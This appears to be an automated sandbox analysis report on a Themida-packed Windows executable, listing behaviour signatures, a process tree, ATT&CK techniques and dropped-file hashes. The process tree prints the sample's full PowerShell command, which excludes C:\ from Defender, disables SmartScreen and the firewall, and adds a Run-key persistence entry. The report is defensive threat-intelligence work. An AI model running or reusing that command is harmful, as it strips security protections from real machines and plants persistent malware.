Analysis

  • max time kernel
    300s
  • max time network
    164s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    02-08-2022 22:15

General

  • Target

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe

  • Size

    3.4MB

  • MD5

    55a6d22be09d762103ae315f97b58561

  • SHA1

    f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1

  • SHA256

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a

  • SHA512

    4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

Malware Config

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
    "C:\Users\Admin\AppData\Local\Temp\41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Drops startup file
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      2⤵
      • Modifies security service
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:728
      • C:\ProgramData\UpSys.exe
        "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
        • C:\ProgramData\UpSys.exe
          "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1624
          • C:\ProgramData\UpSys.exe
            "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
            5⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:1428
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              6⤵
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1588
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:580
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220803001528.log C:\Windows\Logs\CBS\CbsPersist_20220803001528.cab
    1⤵
    • Drops file in Windows directory
    PID:1684

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Modify Existing Service

2
T1031

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

3
T1112

Virtualization/Sandbox Evasion

1
T1497

Install Root Certificate

1
T1130

Discovery

Query Registry

2
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • \ProgramData\MicrosoftNetwork\System.exe
    Filesize

    3.4MB

    MD5

    55a6d22be09d762103ae315f97b58561

    SHA1

    f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1

    SHA256

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a

    SHA512

    4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

  • \ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • memory/580-70-0x0000000000000000-mapping.dmp
  • memory/728-62-0x000007FEF3000000-0x000007FEF3B5D000-memory.dmp
    Filesize

    11.4MB

  • memory/728-74-0x00000000028E4000-0x00000000028E7000-memory.dmp
    Filesize

    12KB

  • memory/728-61-0x000007FEF3B60000-0x000007FEF4583000-memory.dmp
    Filesize

    10.1MB

  • memory/728-59-0x0000000000000000-mapping.dmp
  • memory/728-75-0x00000000028EB000-0x000000000290A000-memory.dmp
    Filesize

    124KB

  • memory/728-72-0x00000000028EB000-0x000000000290A000-memory.dmp
    Filesize

    124KB

  • memory/728-69-0x00000000028E4000-0x00000000028E7000-memory.dmp
    Filesize

    12KB

  • memory/860-57-0x00000000776B0000-0x0000000077859000-memory.dmp
    Filesize

    1.7MB

  • memory/860-58-0x000007FEFC0D1000-0x000007FEFC0D3000-memory.dmp
    Filesize

    8KB

  • memory/860-71-0x00000000006D0000-0x00000000006E0000-memory.dmp
    Filesize

    64KB

  • memory/860-88-0x00000000006D0000-0x00000000006E0000-memory.dmp
    Filesize

    64KB

  • memory/860-54-0x000000013F130000-0x000000013FA88000-memory.dmp
    Filesize

    9.3MB

  • memory/860-56-0x000000013F130000-0x000000013FA88000-memory.dmp
    Filesize

    9.3MB

  • memory/860-55-0x000000013F130000-0x000000013FA88000-memory.dmp
    Filesize

    9.3MB

  • memory/860-87-0x00000000776B0000-0x0000000077859000-memory.dmp
    Filesize

    1.7MB

  • memory/860-86-0x000000013F130000-0x000000013FA88000-memory.dmp
    Filesize

    9.3MB

  • memory/1588-83-0x000007FEF3630000-0x000007FEF418D000-memory.dmp
    Filesize

    11.4MB

  • memory/1588-85-0x000000000254B000-0x000000000256A000-memory.dmp
    Filesize

    124KB

  • memory/1588-84-0x0000000002544000-0x0000000002547000-memory.dmp
    Filesize

    12KB

  • memory/1588-82-0x000007FEF4250000-0x000007FEF4C73000-memory.dmp
    Filesize

    10.1MB

  • memory/1588-80-0x0000000000000000-mapping.dmp
  • memory/1716-66-0x0000000000000000-mapping.dmp